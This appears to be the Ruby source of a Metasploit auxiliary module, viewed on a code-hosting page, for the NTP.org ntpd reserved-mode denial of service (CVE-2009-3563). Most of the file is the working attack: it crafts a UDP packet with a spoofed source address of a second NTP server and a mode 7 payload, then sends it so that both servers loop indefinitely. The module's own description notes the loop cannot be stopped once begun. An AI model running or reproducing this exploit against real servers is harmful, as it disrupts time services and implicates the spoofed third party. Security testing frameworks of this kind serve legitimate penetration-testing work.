Path: blob/master/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb
19591 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Capture7include Msf::Auxiliary::Scanner89def initialize(info = {})10super(11update_info(12info,13'Name' => 'NTP.org ntpd Reserved Mode Denial of Service',14'Description' => %q{15This module exploits a denial of service vulnerability16within the NTP (network time protocol) demon. By sending17a single packet to a vulnerable ntpd server (Victim A),18spoofed from the IP address of another vulnerable ntpd server19(Victim B), both victims will enter an infinite response loop.20Note, unless you control the spoofed source host or the real21remote host(s), you will not be able to halt the DoS condition22once begun!23},24'Author' => [ 'todb' ],25'License' => MSF_LICENSE,26'References' => [27[ 'BID', '37255' ],28[ 'CVE', '2009-3563' ],29[ 'OSVDB', '60847' ],30[ 'URL', 'https://bugs.ntp.org/show_bug.cgi?id=1331' ]31],32'DisclosureDate' => '2009-10-04',33'Notes' => {34'Stability' => [CRASH_SERVICE_DOWN],35'SideEffects' => [],36'Reliability' => []37}38)39)4041register_options(42[43OptAddressLocal.new('LHOST', [true, 'The spoofed address of a vulnerable ntpd server' ])44]45)46deregister_options('FILTER', 'PCAPFILE')47end4849def run_host(ip)50open_pcap5152print_status("Sending a mode 7 packet to host #{ip} from #{datastore['LHOST']}")5354p = PacketFu::UDPPacket.new55p.ip_saddr = datastore['LHOST']56p.ip_daddr = ip57p.ip_ttl = 25558p.udp_src = 12359p.udp_dst = 12360p.payload = ["\x17", "\x97\x00\x00\x00"][rand(2)]61p.recalc62capture_sendto(p, ip)6364close_pcap65end66end676869